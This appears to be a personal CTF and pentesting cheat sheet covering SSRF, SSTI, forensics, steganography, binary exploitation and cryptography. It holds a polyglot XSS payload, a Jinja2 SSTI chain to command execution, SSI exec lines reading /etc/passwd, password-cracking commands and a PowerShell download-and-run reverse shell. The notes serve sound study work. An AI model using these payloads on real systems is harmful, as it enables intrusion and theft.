jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('BERKAN_WAS_HERE') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('BERKAN_WAS_HERE')//>\x3e
SSRF, or server-side request forgery, is a security vulnerability that occurs when an attacker tricks a web application into making unauthorised requests to internal or external resources on the server's behalf.
- Basic SSRF: The attacker sends crafted requests from the vulnerable server to internal or external resources, such as accessing files or databases not intended for public access.
- Blind SSRF: Attackers don't directly see responses but infer information from response times or error message changes.
- Semi-blind SSRF: Attackers don't receive direct responses but use clues like changes in application behavior or response times to gauge success.
What's the impact?
A successful SSRF attack can result in any of the following:
- Access to unauthorised areas.
- Access to customer/organisational data.
- Ability to Scale to internal networks.
- Reveal authentication tokens/credentials.
- Identifying Vulnerable Input: Attackers find input fields within the application, like URL parameters in web forms or API endpoints, which can be manipulated to trigger server-side requests.
And then wait for the server to make a request to the attacker-controlled server.
<a href="/download?server:8087=secure-file-storage.com&id=75482342">Download</a> <!-- Replace the server IP with an attacker-controlled server --> <a href="/download?10.10.116.118:1234&id=75482342">Download</a>
nc -lvnp 1234
- Manipulating the Input: Attackers input malicious URLs or payloads to cause the application to make unintended requests, such as pointing to internal servers or external ones controlled by the attacker.
<input type="hidden" name="server" value="=http://server.website.com/store">
- Requesting Unauthorized Resources: The application server, unaware of the malicious input, makes requests to the specified URLs or resources, potentially targeting internal or sensitive services.
https://berkankutuk.dk/form?server=http://server.website.com/store
- Exploiting the Response: Attackers exploit the responses from malicious requests to gather valuable information like internal server data, credentials, or pathways for further exploitation. Directory traversal and
&x=
can also be used in some cases to manipulate paths.
- Deny List Bypass:
- Deny lists typically block access to localhost or specific IP addresses like 127.0.0.1. However, attackers can bypass these restrictions by using alternative references such as 0, 0.0.0.0, 127.1, or subdomains that resolve to localhost like 127.0.0.1.nip.io.
- Allow List Circumvention:
- Allow lists may restrict URLs to start with
https://website.com
, but attackers can evade this control by creating subdomains on their own domain, likehttps://website.com.attackers-domain.com
, thus gaining control over internal HTTP requests.
- Allow lists may restrict URLs to start with
- Exploiting Open Redirects:
- Open redirects, which automatically redirect users to another website, can be leveraged by attackers to redirect internal HTTP requests to a domain of their choice, especially if SSRF vulnerabilities have stringent rules allowing only specific URLs like
https://website.com/
.
- Open redirects, which automatically redirect users to another website, can be leveraged by attackers to redirect internal HTTP requests to a domain of their choice, especially if SSRF vulnerabilities have stringent rules allowing only specific URLs like
Server-Side Template Injection (SSTI) is a vulnerability that occurs when an attacker can control the template processing engine on the server-side. This allows the attacker to inject and execute code on the server.
Example of SSTI in Python Flask
from flask import Flask, render_template_string
app = Flask(__name__)
@app.route("/profile/<user>")
def profile_page(user):
template = f"<h1>Welcome to the profile of {user}!</h1>"
return render_template_string(template)
app.run()
In the above code, the render_template_string
function is used to render the template. If the user
input is not sanitized, an attacker can inject template code to execute arbitrary commands on the server.
For example, if the attacker sends the following request: http://website.com/profile/{{7*7}}
, the server will render the template as <h1>Welcome to the profile of 49!</h1>
. This shows that the server is executing the code provided by the attacker.
- Identifying Vulnerable Input: Attackers look for input fields within the application that are used to render templates, such as user profiles or comments, which can be manipulated to trigger SSTI.
- Fuzzing: Most template engines will use a similar character set for their "special functions" which makes it relatively quick to detect if it's vulnerable to SSTI. Those are
${{<%[%'"}}%
. To manually fuzz all of these characters, they can be sent one by one following each other.
Manual Fuzzing example
"http://10.10.118.110:5000/profile/$"
"http://10.10.118.110:5000/profile/$\{"
"http://10.10.118.110:5000/profile/${{"
"http://10.10.118.110:5000/profile/${{<"
One of these may yield an error message or a different response, indicating that the application is vulnerable to SSTI.
In the best case scenario, the error message will include the template engine, which marks this step complete. However, if this is not the case, we can use a decision tree to help us identify the template engine:
- Green arrow - The expression evaluated (i.e 42)
- Red arrow - The expression is shown in the output (i.e ${7*7})
Once the template engine is identified, we can use the documentation to exploit the SSTI vulnerability. For this PayloadsAllTheThings is a great resource.
Exploitation POC for Jinja2
Python allows us to call the current class instance with
.__class__
, we can call this on an empty string:
http://10.10.118.110:5000/profile/{{ ''.__class__ }}.
Classes in Python have an attribute called .__mro__
that allows us to climb up the inherited object tree:
http://10.10.118.110:5000/profile/{{ ''.__class__.__mro__ }}.
Since we want the root object, we can access the second property (first index):
http://10.10.118.110:5000/profile/{{ ''.__class__.__mro__[1] }}.
Objects in Python have a method called .__subclassess__
that allows us to climb down the object tree:
http://10.10.118.110:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__() }}.
Now we need to find an object that allows us to run shell commands. Example: The position in the list is 400 (index 401):
http://10.10.118.110:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401] }}.
The above payload essentially calls the subprocess.Popen method, now all we have to do is invoke it (use the code above for the syntax)
http://10.10.118.110:5000/profile/{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }}.
To prevent SSTI vulnerabilities, developers should make use of secure methods and sanitization techniques.
Secure Methods
Most template engines will have a feature that allows you to pass input in as data, rather that concatenating input into the template.
# Insecure: Concatenating input
template = f"<h1>Welcome to the profile of {user}!</h1>"
return render_template_string(template)
# Secure: Passing input as data
template = "<h1>Welcome to the profile of {{ user }}!</h1>"
return render_template_string(template, user=user)
Sanitization
Creating a whitelist character set for user input can help prevent SSTI vulnerabilities. This can be done by checking the input against a list of allowed characters using a regular expression.
import re
# Remove everything that isn't alphanumeric
user = re.sub("^[A-Za-z0-9]", "", user)
template = "<h1>Welcome to the profile of {{ user }}!</h1>"
return render_template_string(template, user=user)
Server Side Includes (SSI) is a simple interpreted server-side scripting language used almost exclusively for the Web. It is most useful for including the contents of one or more files into a web page on a web server, using its #include directive.
<!--#exec cmd="ls" -->
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="cat /etc/passwd" -->
Digital forensics is the art of uncovering and investigating electronically stored data. It involves identifying, acquiring, analyzing, and reporting digital evidence.
Use Cases:
- Uncover hidden data in files or metadata.
- Recover lost or deleted data.
- Reconstruct corrupted files.
- Identify file formats and structures.
- Analyze network logs or memory dumps to trace events.
- Crack password hashes for further investigation.
- Decimal: 70 111 114 101 110 115 105 99 115 33
- Hex: 46 6f 72 65 6e 73 69 63 73 21
- Octal: 106 157 162 145 156 163 151 143 163 41
- ASCII: Forensics!
- Base64: Rm9yZW5zaWNzIQ==
- Base85: 7W3<YDKBN%F!1
The file type is often indicated by the file extension in the file name, e.g. .png, .mp4
- Typically what the OS uses to assess how to open / interpret the file
- Do not rely on extensions! Can be modified to trick the OS into misinterpreting data
The file type is indicated in the contents of the file with a file signature - a magic number
- Hex string at a specific offset
- Eg PNG files: 89 50 4e 47 (last three hex is PNG in ASCII)
- Tool:
file
pngcheck
A command-line tool for "checking" a PNG image file. Especially good for verifying checksums.
Combining two images
from PIL import Image
import numpy as np
# Load the images based on the provided file names
img1 = Image.open('/mnt/data/scrambled1.png')
img2 = Image.open('/mnt/data/scrambled2.png')
# Convert the images to numpy arrays
img_data1 = np.asarray(img1)
img_data2 = np.asarray(img2)
# Perform the element-wise addition of the two images' data
# Since the data type of PIL images is unsigned integer 8 bits,
# the result must be clipped to be in the range [0, 255]
data = np.add(img_data1, img_data2, dtype=np.uint8)
# Create a new image from the combined data
new_image = Image.fromarray(data)
# Save the result image
result_path = "/mnt/data/out.png"
new_image.save(result_path, "PNG")
# Provide the path for downloading the result
result_path
The file extension is one form of metadata: (data about data)
Additional information about a file in addition to the content itself
- General: File name, extension, size, time of origin, permissions
- Specific: GPS data in images, number of frames in GIF, CPU architecture in executables, etc.
Why analyze metadata?
- Can store important info - maybe even info that should have been hidden
- In some cases even more important than content - eg with encrypted HTTPS traffic
- Tool:
exiftool
Log Analysis
Log files are a record of events that happen on a system. They are used to record everything from user activity to system events. Log files are used to track and record the activities of users, processes, and applications on a system.
In order to effectively analyze log files and identify any suspicious activity, it is important to understand the structure of the log files and the type of information they contain. See Log Analysis for more.
PDF Analysis
We can try to read the metadata using the program pdfinfo
. Pdfinfo displays various metadata related to a PDF file, such as title, subject, author, creator, and creation date. If you don’t have pdfinfo
installed, you can install it using: sudo apt install poppler-utils
If the PDF file is password protected, another tool named pdfcrack
can be used with a wordlist in order to bruteforce the password.
Example:
pdfcrack -q -w /usr/share/wordlists/rockyou.txt encrypted.pdf
Geographical Coordinates
Longitude Latitude
Can be written as:
51 deg 30' 51.90" N, 0 deg 5' 38.73" W
replaced deg with °
51° 30' 51.90" N, 0° 5' 38.73" W
or simply 51.514417, -0.094092
A file type has a specific format - the structure of the file
Typical structure
- Signature file - magic number
Header - typical info to be used to understand the content (metadata)
- Possibly meta data
- Data
- Trailer that completes the file
The format is precisely defined in a specification doc - often publicly available
- Corrupted files: compare file with specification, correct differences with hex editor
- Unknown file types: search for tracks from a file format
TO BE ADDED
Steganography is the practice of hiding a secret message in something that is not secret, for example: A message inside a jpg file, or a binary inside a png.
File Carving
File carving: extract files based on the file format
- Look for file signatures, headers, trailers, etc.
- Originally used in connection with. extraction of files from disk images and memory dumps
- Useful for extracting files stored in other files in stego challenges
File carving tools:
- binwalk
- foremost
- dd (manual extraction)
- dd if = input.png or = output.txt bs = 1 skip = 1000 count = 32
Tools
Steghide
= JPEG(primarily), BMP, WAV and AU
Zsteg
= PNG(primarily), BMP
stegsnow is a program for concealing messages in text files by appending tabs and spaces (whitespace) on the end of lines, and for extracting messages from files containing hidden messages.
Useful commands:
stegsnow -C -m <message> -p <password> <inputfile> <outputfile>
compress a message in a text file and save it to a new file
stegsnow -C -p <password> <inputfile> <outputfile>
uncompress a message in a text file and save it to a new file
Steghide is a steganography program that hides data in various kinds of image and audio files, only supports these file formats : JPEG, BMP, WAV and AU. But it’s also useful for extracting embedded and encrypted data from other files. One of the greatest benefits of stegohide, is that it can encrypt data with a passphrase
Install steghide with sudo apt install steghide
Useful commands:
steghide info <filepath>
displays info about whether a file has embedded data or not.
steghide extract -sf <filepath>
extracts embedded data from a stegofile
steghide embed -cf <filepath> -ef <textfile>
embed data from a coverfile to a embedfile
steghide info <filepath>
displays total embeddable data size in the coverfile
Example:
Embed a zip file into a jpg file
steghide embed -cf original.jpg -ef test.zip
Sometimes there is a message or a text hidden in the image itself and in order to view it you need to apply some color filters or play with the color levels. You can do it with GIMP or Photoshop or any other image editing software but stegsolve made it easier. It’s a small java tool that applies many color filters on images.
Installation
wget http://www.caesum.com/handbook/Stegsolve.jar -O stegsolve.jar
chmod +x stegsolve.jar
And then run it with
java -jar bin/stegsolve.jar
Stegseek is a lightning fast steghide cracker
After installing stegseek here, you can use it to crack a password protected steghide file with the following command:
stegseek <file>
Stegoveritas supports just about every image file, and is able to extract all types of data from it
Installation:
berkankutuk@kali:~$ sudo pip3 install stegoveritas
berkankutuk@kali:~$ stegoveritas_install_deps
Useful commands:
stegoveritas filename
- Simple stego scan
stegoveritas -meta filename
- Check file for metadata information
stegoveritas -steghide filename
- Check for StegHide hidden info.
stegoveritas -extractLSB filename
- Extract a specific LSB RGB from the image.
Collection of steganography tools - helps with CTF challenges
Strings is a linux tool that displays printable strings in a file. That simple tool can be very helpful when solving stego & binary challenges. Usually the embedded data is password protected or encrypted and sometimes the password is actaully in the file itself and can be easily viewed by using strings. It’s a default linux tool so you don’t need to install anything.
Useful commands:
strings file
displays printable strings in the given file
strings -el file
displays printable strings in the given file in little-endian format
Sometimes important stuff is hidden in the metadata of the image or the file , exiftool can be very helpful to view the metadata of the files.
Useful commands:
exiftool file
shows the metadata of the given file
exiftool -Comment="something" file
to add a comment to the metadata of the file
A tool similar to exiftool.
Useful commands:
exiv2 file
shows the metadata of the given file
Binwalk is a tool for searching binary files like images and audio files for embedded files and data.
Useful commands:
binwalk <filepath>
Displays the embedded data in the given file
binwalk -e <filepath>
Displays and extracts the data from the given file
foremost
is another file carving tool like binwalk, and can be installed with sudo apt-get install foremost
.
Useful commands:
Search for all file types in the given image file
foremost image.png
Search for a selection of file types in the given image file (-i image.dd
)
foremost -t doc,jpg,pdf,xls -i image.dd
zsteg is a tool that can detect hidden data in png and bmp files.
Useful commands:
zsteg file
Runs a simple scan on the given file
zsteg -a file
Runs all the methods on the given file
zsteg -E file
Extracts data from the given payload (example : zsteg -E b4,bgr,msb,xy
name.png)
zsteg -l 0 file
Limits the bytes checked to 0
Another command-line tool to use against JPEG Images
A command-line tool to quickly scan multiple forms of barcodes (QR Codes)
Install with sudo apt install zbar-tools
Useful commands:
zbarimg <filename>
Alternatively, you can use a online tool like zxing to decode QR codes.
WavSteg is a python3 tool that comes with the package stegolsb
which can hide data and files in wav files and can also extract data from wav files.
Useful commands:
python3 WavSteg.py -r -i soundfile -o outputfile
extracts data from a wav sound file and
outputs the data into a new file
Use an online tool like Databorder Morse or Morse Code World if the wav file contains morse code.
OutGuess is a universal tool for steganography that allows the insertion of hidden information into the redundant bits of data sources. The supported formats are JPEG, PPM and PNM.
Useful commands:
To embed the message hidden.txt into the monkey.jpg image:
outguess -k "my secret pass phrase" -d hidden.txt monkey.jpg out.jpg
Retrieve the hidden message from the image:
outguess -k "my secret pass phrase" -r out.jpg message.txt
Options:
-k <key>
key
-d <name>
filename of dataset
-p <param>
parameter passed to destination data handler
-r
retrieve message from data
Sonic visualizer is a tool for viewing and analyzing the contents of audio files, however it can be helpful when dealing with audio steganography. You can reveal hidden shapes in audio files or use it to se hidden images inside audio files.
Layer->Add Spectrogram
should work
Making a spectrogram
- Create a small white text on a black background
- Convert the text to audio using this imagetoaudio tool
- Open Audacity and import the audio file.
- Select another track and import the audio file again
- Now merge the two tracks by selecting the first track and then the second track and then
Tracks->Mix->Mix and Render
- Now select the mixed track and then
Tracks->Add New->Spectrogram
Now you should see the hidden text in the spectrogram
Zero-width characters are characters that have no width when displayed, but can be used to hide information in text. These characters are often used in steganography to hide messages in plain sight. A useful tool for detecting zero-width characters is Unicode Steganography with Zero-Width Characters .
Traditionel computer forensics can be made out of volatile memory.
What is volatile data?
- Volatile data: non-permanent data, disappears when the power goes out
- Typically the contents of main memory RAM
- "Live box forensics"
- Analysis takes place on a memory dump - provides a snapshot
Data that can be found in volatile memory
- Running processes and services
- Open files
- Network connections
- Run commands
- Passwords, keys
- Unencrypted data that is encrypted on disk but must be used in decrypted mode in memory
- Stateless malware - malware that lives only in memory
- Even things like a basic screenshot or the user's clipboard
A tool used for analyzing memory dumps is volatility 3.
Volatility 3 is a memory forensics framework that allows you to analyze memory dumps.
Useful commands:
vol.py -f <memory dump> imageinfo
- Get information about the memory dumpvol.py -f <file> windows.filescan.FileScan
- List all files in the memory dumpvol.py -f <file> windows.pslist.PsList
- List all processes in the memory dumpvol.py -f <file> windows.dumpfiles.DumpFiles --virtaddr <address>
- Dump a file from the memory dump--pid PID
Process ID to include (all other processes are excluded)--virtaddr VIRTADDR
Dump a single _FILE_OBJECT at this virtual address--physaddr PHYSADDR
Dump a single _FILE_OBJECT at this physical address
Remember to append the --output-dir <directory>
flag to save the output to a directory. Or simply redirect the output to a file with > <filename>
. I've written more about Volatility 3 here.
TO BE ADDED
The Sleuth Kit is a collection of command-line tools for analyzing disk images and recovering data. It is used by digital forensics professionals and law enforcement agencies to investigate computer crimes.
Examples of tools in The Sleuth Kit:
mmls disk.flag.img # see partitions
fsstat -o 2048 disk.flag.img # determine file system
fls -o 2048 dds2-alpine.flag.img # list files
fls -o 2048 dds2-alpine.flag.img 18290 # list files in a directory
icat -o 2048 dds2-alpine.flag.img 18291 # extract a file
fls -i raw -f ext4 -o 360448 -r disk.flag.img | grep flag # search for files with flag in the name
icat -i raw -f ext4 -o 360448 -r disk.flag.img 2371 # extract a file by inode
-i is the image type,
-f is the file system type
-r is to recursively display directories
TO BE ADDED
TO BE ADDED
To see if a stack overflow is possible, run the following command:
checksec --file=<executable>
If the output contains Canary found
and NX enabled
, then a stack overflow is possible. See more about this command here.
TO BE ADDED
TO BE ADDED
TO BE ADDED
TO BE ADDED
Buffer overflow is a type of security vulnerability that occurs when a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory locations. This can cause the program to crash or, in the case of a remote attacker, to execute arbitrary code on the system.
Quick note:
- If some C code contains the function
gets()
orstrcpy()
, it is vulnerable to a buffer overflow attack. - An important part of the memory we can overwrite is the instruction pointer (IP/return address), which is called the eip on 32-bit machines, and rip on 64-bit machines. The IP points to the next instruction to be executed, so if we redirect the eip in a binary to point to a different location, we can execute arbitrary code.
- The top of the stack is pointed to by the SP (or stack pointer) which is called esp in 32-bit machines.
A very simple example of a buffer overflow exploit looks like the following:
python -c "print ('A' * 100)" | ./<executable>
TO BE ADDED
Return Oriented Programming (ROP) works by chaining together small pieces of code, called "gadgets," that are already present in the target program's memory space to perform a series of operations that the attacker desires. Each gadget typically ends with a "return" instruction that tells the program where to continue executing code after the gadget has finished.
By carefully selecting and chaining together gadgets that end with a return instruction, attackers can construct a "ROP chain" that allows them to execute their own code on the target system. This technique can be used to bypass security measures such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR).
A tool that can detect binary security security mechanisms is checksec
. I've written about the tool here.
NX is a hardware security feature that prevents execution of code from non-executable memory regions. This helps to prevent certain types of attacks, such as buffer overflow exploits, which attempt to execute malicious code by overwriting the memory. Also means no shellcode can be executed from the stack.
PIE is a security feature that randomizes the base address of the program's code and data sections at runtime. This makes it more difficult for an attacker to predict the memory address of a vulnerable function or piece of data, and thus makes it harder to exploit certain types of vulnerabilities.
ASLR is a security technique that randomizes the memory layout of a process at runtime. This makes it more difficult for an attacker to predict the memory address of a vulnerable function or piece of data, and thus makes it harder to exploit certain types of vulnerabilities.
Stack Canaries is a security mechanism that detects buffer overflow attacks. It works by placing a small value, known as a "canary," on the stack before the return address. If a buffer overflow occurs, the canary value will be overwritten, and the program will detect the modification and terminate the execution.
RELRO is a security feature that makes certain sections of the program read-only after the dynamic linker has resolved all symbols. This prevents an attacker from overwriting important data or functions in memory, and can help to prevent certain types of attacks, such as the Global Offset Table (GOT) overwrite.
TO BE ADDED
A format string vulnerability is a type of software vulnerability that occurs when a program uses user input to construct a format string for the printf
or scanf
functions without properly validating or sanitizing the input. This can allow an attacker to execute arbitrary code or read sensitive data from the program's memory. Read more about the functions here.
The format specifiers are the following:
Format Specifier | Description |
---|---|
%c | Character |
%d | Signed decimal integer |
%e | Scientific notation |
%f | Decimal floating point |
%g | Use the shortest representation: %e or %f |
%i | Signed decimal integer |
%o | Unsigned octal |
%s | String of characters |
%u | Unsigned decimal integer |
%x | Unsigned hexadecimal integer |
%X | Unsigned hexadecimal integer (uppercase) |
A simple example of a format string vulnerability is the following:
python -c "print ('%x ' * 100)" | ./<executable> # Local
python -c "print ('%x ' * 100)" | nc <host> <port> # Remote
Its also possible to brute force the stack for values.
from pwn import *
for i in range(1, 50):
r = remote('<host>', <port>)
r.sendline('%' + str(i) + '$s')
print('%' + str(i) + '$s')
print(r.recv())
Integer overflow is a type of software vulnerability that occurs when an integer value is incremented beyond its maximum value, causing it to "wrap around" to a negative value. This can lead to unexpected behavior in the program, such as crashes or security vulnerabilities.
BYTE = 8 bits
WORD = 16 bits
DWORD = Double Word (32 bits)
QWORD = Quad Word (64 bits)
TO BE ADDED
Reverse-engineering is the creative process of analyzing software and understanding it without having access to the source code. It is the process by which software is deconstructed in a way that reveals its innermost details such as its structure, function and operation.
Find the in-depth content for the Assembly x86-64 language here.
TO BE ADDED
A disassembler is a computer program that translates machine language into assembly language—the inverse operation to that of an assembler. A debugger is a computer program that is used to test and debug other programs.
strace
is a debugging utility in Linux used to monitor the system calls used by a program and all the signals it receives.
ltrace
is a debugging utility in Linux used to display the calls a user space application makes to shared libraries. It traces the library calls made by a process and the signals received by the process.
GDB, the GNU Project debugger, allows you to see what is going on `inside' another program while it executes -- or what another program was doing at the moment it crashed.
berkankutuk@kali:~$ gdb <binary file> # opens the binary file in gdb
(gdb)> set disassembly-flavor intel # sets the disassembly flavor to intel
(gdb)> break <function_name> # sets a breakpoint at the given function
(gdb)> break *<addr> # sets a breakpoint at the given address
(gdb)> si # steps through the program one instruction at a time
(gdb)> ni # steps over the current instruction
(gdb)> run # runs the program until it reaches the first breakpoint
(gdb)> run <input file> # runs the program with the given input file
(gdb)> disassemble <function_name> | main # disassembles the given function
(gdb)> x/s <addr> # prints a string from memory address
(gdb)> continue # continues the execution of the program
(gdb)> info registers # prints the values of the registers
(gdb)> info variables # prints the values of the variables
(gdb)> info functions # prints the functions
(gdb)> set $eax=0 # sets the value of the eax register to 0
(gdb)> exploit # runs the exploit
(gdb)> x # inspect memory locations
(gdb)> quit # quits gdb
Radare2 is an open-source framework that can perform disassembly, debugging, analysis, comparing data and manipulation of binary files.
berkankutuk@kali:~$ r2 <binary file>` # opens the binary file in radare2
berkankutuk@kali:~$ r2 -d <binary file>` # opens the binary file in radare2 in debug mode
# General
[0x00400510]> aaa # Analyze the binary
[0x00400510]> afl # List functions
[0x00400510]> s main # Go to main function
[0x00400510]> pdf # Print disassembled function
[0x00400510]> s/ password # Search for data within the code
[0x00400510]> V # Hex view
[0x00400510]> VV # Visual mode
# Debug mode
[0x00400510]> db <addr> # Set breakpoint at address
[0x00400510]> dc # Continue execution
[0x00400510]> dr # Show registers
[0x00400510]> s # step instruction
Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency (NSA). It is a free and open-source software reverse engineering tool released under the Apache License 2.0.
berkankutuk@kali:~$ ghidraRun <binary file>` # opens the binary file in ghidra
Ghidra GUI
Right click -> Patch Instruction -> Values # Patch the instruction with the given values
File -> Export Program -> Export as ELF # Export the binary as an ELF file
Symbol Tree -> Functions # List functions (ex. Main)
Cytoscape is a tool for network analysis and visualization that can be used to see call graphs.
Useful functions:
- Layout -> Grid View = Show a grid view of the nodes.
- Pathlinker = Find paths between nodes. Needs a source and a target node. K = number of paths to find. Is mostly one in CTF situations.
A decompiler is a computer program that takes an executable file as input, and attempts to create a high level code (like C/C++, Java).
A jar file is a Java archive file that can contain multiple files and folders. Jar files are mainly used for archiving, compression and decompression. Jar files are similar to zip files, but jar files can have additional attributes that are required for a Java application to run.
To decompile a jar file, procyon can be used. For online DogBolt is a good option.
berkankutuk@kali:~$ sudo apt-get install -y procyon-decompiler
berkankutuk@kali:~$ procyon -jar <jar file> -o <output directory>
- dotPeek - Free .NET decompiler and assembly browser
- ILSpy - .NET Decompiler with support for PDB generation, ReadyToRun, Metadata (&more) - cross-platform!
To generate a private key we use the following command (8912 creates the key 8912 bits long):
openssl genrsa -aes256 -out private.key 8912
To generate a public key we use our previously generated private key:
openssl rsa -in private.key -pubout -out public.key
Lets now encrypt a file (plaintext.txt) using our public key:
openssl rsautl -encrypt -pubin -inkey public.key -in plaintext.txt -out encrypted.txt
Now, if we use our private key, we can decrypt the file and get the original message:
openssl rsautl -decrypt -inkey private.key -in encrypted.txt -out plaintext.txt
Cryptii has multiple decoding tools like base64, Ceaser Cipher, ROT13, Vigenère Cipher and more.
Dcode If you see any thing that has the shape of a sentence but it looks like nonsense letters, and notes some shift left or right, it may be a keyboard shift...
Sometimes the letters may be shifted by a stated hint, like a binary bit shift ( x >> 1 ) or ( x << 1 ).
Bit Calculator is a good tool to calculate bit shifts. For other bit operations, use the RapidTables tool.
Sometimes a "ciphertext" is just as easy as reversed text. Don't forgot to check under this rock! You can reverse a string in Python like so:
"UOYMORFEDIHOTGNIYRTEBTHGIMFTCA.TAHTTERCESASISIHT"[::-1]
ANY text could be XOR'd. Techniques for this are Trey's code, and XORing the data against the known flag format. Typically it is given in just hex, but once it is decoded into raw binary data, it gives it keeps it's hex form (as in \xde\xad\xbe\xef etc..) Note that you can do easy XOR locally with Python like so (you need pwntools installed):
python >>> import pwn; pwn.xor("KEY", "RAW_BINARY_CIPHER")
The Vigenère cipher is a method of encrypting alphabetic text by using a series of interwoven Caesar ciphers, based on the letters of a keyword. It employs a form of polyalphabetic substitution.
The encryption of the original text is done using the Vigenère square or Vigenère table. It is a table of alphabets written out 26 times in different rows, each alphabet shifted cyclically to the left compared to the previous alphabet, corresponding to the 26 possible Caesar ciphers. At different points in the encryption process, the cipher uses a different alphabet from one of the rows. The alphabet used at each point depends on a repeating keyword.
The Caesar cipher is one of the earliest known and simplest ciphers. It is a type of substitution cipher in which each letter in the plaintext is replaced by a letter some fixed number of positions down the alphabet. For example, with a left shift of 3, D would be replaced by A, E would become B, and so on. The method is named after Julius Caesar, who used it in his private correspondence.
ROT13 is a simple letter substitution cipher that replaces a letter with the letter 13 letters after it in the alphabet. ROT13 is an example of the Caesar cipher which was developed in ancient Rome.
A substitution cipher is a method of encoding by which units of plaintext are replaced with ciphertext, according to a fixed system; the "units" may be single letters (the most common), pairs of letters, triplets of letters, mixtures of the above, and so forth. The receiver deciphers the text by performing the inverse substitution.
Useful tools for substitution ciphers are Cryptii and Dcode.
Encoded data can be decoded immediately, without keys. It's NOT a form of encryption, it just a way of representing data.
A very popular encoding is Base64.
The basic idea behind Base64 encoding is to represent binary data using only ASCII characters. To do this, Base64 converts each 3 bytes of binary data into 4 bytes of ASCII text. The 3 bytes of binary data are divided into 4 groups of 6 bits each, which are then represented by a character from a set of 64 characters. The 64 characters used in Base64 are:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
The equals sign (=) is also used as a padding character to ensure that the length of the output is a multiple of 4 characters.
For example, let's say we want to encode the binary data "011000010110001001100011
", which represents the ASCII characters "abc
". To encode this data in Base64, we first divide it into 3-byte groups:
01100001 01100010 01100011
Then we divide each 3-byte group into 4 groups of 6 bits each:
011000 010110 001001 100011
Next, we convert each group of 6 bits to its corresponding Base64 character:
Y W J j
So the encoded Base64 string for "abc
" is "YWJj
".
echo -n "Hello World" | base64
echo -n "SGVsbG8gV29ybGQ=" | base64 -d
base64 /path/to/file > output.txt # Encoding
base64 -d /path/to/file > output.txt # Decoding
Hashing is used for 2 main purposes in Cyber Security. To verify integrity of data, or for verifying passwords.
plaintext ➡️ hash
hash ⛔ plaintext
Doing a lookup in a sorted list of hashes that are not salted is quite fast, much much faster than trying to crack the hash. But in case we have to crack, then its done by hashing a large number of different inputs (often rockyou.txt, these are the possible passwords), potentially adding the salt if there is one and comparing it to the target hash.
Tools like Hashcat and John the Ripper are normally used for this.
TO BE ADDED
plaintext ➡️ 🔑 ➡️ ciphertext
plaintext ⬅️ 🔑 ⬅️ ciphertext
(🔑 shared key)
plaintext ➡️ 🔑 ➡️ ciphertext
plaintext ⬅️ 🗝 ⬅️ ciphertext
(🔑 public key, 🗝 private key
Public key to encrypt, private key to decrypt.
If you are using Kali linux or Parrot OS, you should have a binary add on called gpg2john
. This binary program allows us to convert the gpg file into a hash string that john the ripper can understand when it comes to brute-forcing the password against a wordlist.
How to use it (GPG example):
gpg2john encrypted_file.txt.gpg > hash.txt
Then you can use john the ripper to crack the password.
john --wordlist=/usr/shared/wordlists/rockyou.txt --format=gpg hash.txt
The result should reveal the password if you have used a strong wordlist that contains it.
TO BE ADDED
You can see the actual website the shortened link is redirecting you to by appending "+" to it (see the examples below). Type the shortened URL in the address bar of the web browser and add the above characters to see the redirect URL.
Example: tinyurl.com/mv2h897s+
Example providers:
- bit.ly
- goo.gl
- ow.ly
- s.id
- smarturl.it
- tiny.pl
- tinyurl.com
- x.co
Ensure you have the knowlege of SQL DBs first. See here.
Start by starting the mysql service:
service mysql start
Then connect to the database:
mysql -u root -p -h <ip_address>
Now you can use the following commands to read the database:
show databases;
use <database_name>;
show tables;
select * from <table_name>;
describe <table_name>;
If you have access to the database file, you can use the following command to read it:
mysql -u <username> -p
Type "source" followed by the filename of the mysql database to specify that you wish to view its database.
source /home/berkan/serverLx/employees.sql -- example
You can now view the database using the commands from the previous section.
Active Directory is a collection of machines and servers connected inside of domains, that are a collective part of a bigger forest of domains, that make up the Active Directory network.
Other related terms include: Domain controllers, Trusts & Policies, Services, Authentication & Cloud security.
If you have access to PowerShell, you can get a Reverse shell by using nishang's Invoke-PowerShellTcp.ps1 script inside of the Shells directory. Be sure to add the function call example to the bottom of your script, so all you need to to do to host it is (on your Attacker machine):
python -m SimpleHTTPServer
and then on the victim machine:
powershell IEX( New-Object Net.WebClient).DownloadString("http://10.10.14.6:8000/reverse.ps1") )
Also, if you want to have nice up and down arrow key usage within your Windows reverse shell, you can use the utility rlwrap before your netcat listener command.
rlwrap nc -lnvp 9001
smbmap tells you permissions and access, which smbclient does not do!
smbmap
To try and list shares as the anonymous user (this doesn't always work for some weird reason)
smbmap -H <IP> -u anonymous
enum4linux
Another enumeration tool is enum4linux which can be used like this:
enum4linux <ip>
smbclient
You can use smbclient to look through files shared with SMB. To list available shares:
smbclient -m SMB2 -N -L //10.10.10.125/
The -L flag specifies that we want to retrieve a list of available shares on the remote host, while -N suppresses the password prompt.
For more, see this page: Samba
Google
A simple search: openssh 7.2 exploit
Exploit-DB
berkankutuk@kali:~$ sudo apt install exploitdb -y
berkankutuk@kali:~$ searchsploit openssh 7.2
MetaSploit
- Running reconnaissance scripts to enumerate remote hosts and compromised targets
- Verification scripts to test the existence of a vulnerability without actually compromising the target
- Meterpreter, which is a great tool to connect to shells and run commands on the compromised targets
Quick exploit search
msf6 > search exploit eternalblue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
<SNIP>
EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010
Then to use it
msf6 > use exploit/windows/smb/ms17_010_psexec
Other
We can also utilize online exploit databases to search for vulnerabilities, like Exploit DB, Rapid7 DB, or Vulnerability Lab.
The tty command of terminal basically prints the file name of the terminal connected to standard input. tty is short of teletype, but popularly known as a terminal it allows you to interact with the system by passing on the data (you input) to the system, and displaying the output produced by the system
Shell Spawning
